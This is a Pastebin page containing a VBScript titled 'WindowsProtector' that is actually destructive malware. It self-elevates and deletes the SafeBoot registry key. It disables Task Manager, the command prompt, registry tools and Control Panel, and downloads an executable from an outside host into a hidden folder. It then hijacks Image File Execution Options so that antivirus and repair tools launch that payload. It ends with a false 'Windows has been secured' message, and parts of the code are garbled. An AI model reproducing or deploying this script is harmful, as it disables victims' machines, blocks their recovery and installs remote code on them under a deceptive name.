Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Rem WindowsProtector
- If WScript.Arguments.Named.Exists("elevated") = False Then
- CreateObject("Shell.Application").ShellExecute "wscript.exe", """" & WScript.ScriptFullName & """ /elevated", "", "runas", 1
- WScript.Quit
- End If
- User = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%UserProfile%")
- dim Reg, fso, Eater
- Set Reg = CreateObject("WScript.Shell")
- Set fso = CreateObject("Scripting.FileSystemObject")
- Set Eater = fso.GetFile(Wscript.ScriptFullName)
- SlapClap
- HideFiles
- BolbisName
- Write2
- RunBat
- Holder
- BolbiMessage
- Write1
- CounterRemoval
- Success
- Sub SlapClap
- Dim oFSO
- Set oFSO = CreateObject("Scripting.FileSystemObject")
- oFSO.CreateFolder("C:\Users\Public\ghostroot")
- End Sub
- Sub HideBolbi
- Set fso = CreateObject("Scripting.FileSystemObject")
- Set Invisible1 = fso.getFolder("C:\Windows\")
- Set Invisible2 = fso.getFolder("C:\Windows\System32")
- Set Invisible3 = fso.getFile("C:\Windows\regedit.exe")
- Set Invisible4 = fso.getFile("C:\Windows\system32\regedit32.exe")
- Set Invisible5 = fso.getFile("C:\Windows\system32\cmd.exe")
- Set Invisible6 = fso.getFile("C:\Windows\system32\taskmgr.exe")
- Set Invisible7 = fso.getFile("C:\Windows\system32\gpedit.msc")
- Set Invisible8 = fso.getFolder("C:\Users\Public\ghostroot")
- Invisible1.Attributes = Invisible1.Attributes or 2 ' 2 = hidden
- Invisible2.Attributes = Invisible2.Attributes or 2 ' 2 = hidden
- Invisible3.Attributes = Invisible3.Attributes or 2 ' 2 = hidden
- Invisible4.Attributes = Invisible4.Attributes or 2 ' 2 = hidden
- Invisible5.Attributes = Invisible5.Attributes or 2 ' 2 = hidden
- Invisible6.Attributes = Invisible6.Attributes or 2 ' 2 = hidden
- Invisible7.Attributes = Invisible7.Attributes or 2 ' 2 = hidden
- Invisible8.Attributes = Invisible8.Attributes or 2 ' 2 = hidden
- End Sub
- Sub BolbisName
- On Error Resume Next
- reg.regwrite "HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName\ComputerName","Bolbi", "REG_SZ"
- reg.regwrite "HKCU\Control Panel\Interational\s1159","Bolbi", "REG_SZ"
- reg.regwrite "HKCU\Control Panel\International\s2359","Bolbi", "REG_SZ"
- End Sub
- Sub Success
- MsgBox("Windows has been secured")
- End Sub
- Sub Write1
- Set fso = CreateObject("Scripting.FileSystemObject")
- set shell=CreateObject("Wscript.Shell")
- Set file = fso.CreateTextFile("C:\Users\Public\Ghostroot\Nope666666.msc")
- Set HideThis = fso.getFile("C:\Users\Public\Ghostroot\Nope666666.msc")
- HideThis.Attributes = HideThis.Attributes or 2 ' 2 = hidden
- file.Write "Not happening dude "
- End Sub
- Sub Write2
- Set fso = CreateObject("Scripting.FileSystemObject")
- set shell=CreateObject("Wscript.Shell")
- Set file = fso.CreateTextFile("C:\Users\Public\Ghostroot\Nope.bat")
- Set HideThis = fso.getFile("C:\Users\Public\Ghostroot\Nope.bat")
- HideThis.Attributes = HideThis.Attributes or 2 ' 2 = hidden
- file.Write "@echo off "
- file.WriteBlankLines(1)
- file.Write "REG delete HKLM\System\CurrentControlSet\Control\SafeBoot /f"
- file.WriteBlankLines(1)
- file.Write "REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel /f"
- file.WriteBlankLines(1)
- file.Write "REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableLockWorkstation /f"
- file.WriteBlankLines(1)
- End Sub
- Sub RunBat
- Dim Shell
- Set Shell = CreateObject("Wscript.Shell")
- Shell.run "C:\Users\Public\Ghostroot\Nope.Bat"
- End Sub
- Sub Holder
- WScript.Sleep 10000
- Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "1", "REG_DWORD"
- Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"
- Reg.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
- Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", "1", "REG_DWORD"
- Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableLockWorkstation", "1", "REG_DWORD"
- End Sub
- Sub BolbiMessage
- dim xHttp, bStrm
- Set xHttp = createobject("Microsoft.XMLHTTP")
- Set bStrm = createobject("Adodb.Stream")
- xHttp.Open "GET", "http://i.pomf.pl/qljcsu.exe", False
- xHttp.Send
- with bStrm
- .type = 1
- .open
- .write xHttp.responseBody
- .savetofile "C:\Users\Public\ghostroot\qljcsu.exe", 2
- End With
- End Sub
- Sub Write1
- Set fso = CreateObject("Scripting.FileSystemObject")
- Set file = fso.CreateTextFile(User & "\Desktop\Opps.txt")
- file.Write "HA HA HA HA HA"
- End Sub
- Sub CounterRemoval
- WScript.Sleep 5000
- On Error Resume Next
- Reg.Write "HKCR\inffile\shell\Install\command\logoff.exe "
- Reg.Write "HKCR\regfile\shell\open\command\ logoff.exe "
- Reg.Write "HKCR\VBSFile\Shell\Edit\Command\logoff.exe "
- Reg.Write "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"
- Reg.Write "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"
- Reg.Write "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
- Reg.write "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions" , "1", "REG_DWORD"
- Reg.write "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileAssociate", "1", "REG_DWORD"
- Reg.write "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileAssociate", "1", "REG_DWORD"
- Reg.write "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
- Reg.write "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
- Reg.write "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
- Reg.write "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
- Command%20Prompt%20Portable/CommandPromptPortable_2.4.paf.exe
- Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msert.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
- Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TaskKiller.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
- Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mssecse.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
- Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
- Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
- Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
- Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner32.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
- Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner64.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
- Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vbsedit.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
- Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\htaedit.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
- Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VirtualBox.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
- Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
- Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uTorrent.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
- Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uninstall.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
- Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad++.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
- Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adwcleaner_5.005.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
- Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\student.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
- Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gpedit.msc\Debugger","C:\Users\Public\Ghostroot\Nope666666.msc"
- Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
- Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
- Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
- Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
- Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
- Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TaskMgr.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
- Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\attrib.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
- Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
- Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
- Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\installer.exe\Debugger","C:\Users\Public\Ghostroot\qljcsu.exe"
- Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD", "1", "REG_DWORD"
- Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
- End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement